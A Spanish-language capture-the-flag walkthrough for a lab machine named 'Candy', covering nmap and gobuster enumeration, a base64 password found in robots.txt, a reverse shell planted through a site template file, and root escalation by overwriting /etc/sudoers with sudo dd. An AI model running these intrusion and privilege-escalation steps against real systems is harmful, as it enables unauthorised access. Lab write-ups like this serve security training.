Candy

✍️ Autor: Luisillo_o🔍 Dificultad: Fácil 📅 Fecha de creación: 29/08/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 80 perteneciente al servicio HTTP está abierto por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p80 -v 172.17.0.2

para que nos proporcione más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web llamada Cassiopeia.

Como nos pide unas credenciales vamos a revisar el archivo robots.txt por si contiene algo relevante.

Vemos unas credenciales pero la contraseña parece ser que está codificada en base64.

echo "c2FubHVpczEyMzQ1" | base64 -d

Nos logueamos y estamos dentro.

Ahora buscaremos directorios y archivos con la herramienta Gobuster a través de:

gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,php,txt,xml

Nos encontramos un directorio llamado /administrator y entramos en él y nos pide unas credenciales que hemos encontrado anteriormente.

Nos logueamos y estamos dentro.

🚀 EXPLOTACIÓN

Vamos a System en concreto Sites Templates y editamos el archivo error.php para hacer una Reverse Shell. Nos ponemos en escucha.

nc -lvnp 443

Hacemos el tratamiento de la TTY para trabajar más cómodos.

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar. No tenemos permisos SUDO.

find / -user luisillo 2>/dev/null

Mostramos el contenido de ese archivo.

cat /var/backups/hidden/otro_caramelo.txt

Parecen unas credenciales por lo que intentamos loguearnos.

Tenemos permisos SUDO con dd por lo que revisamos esta página.

echo "luisillo ALL=(ALL:ALL) ALL" | sudo /bin/dd of=/etc/sudoers

Last updated

Was this helpful?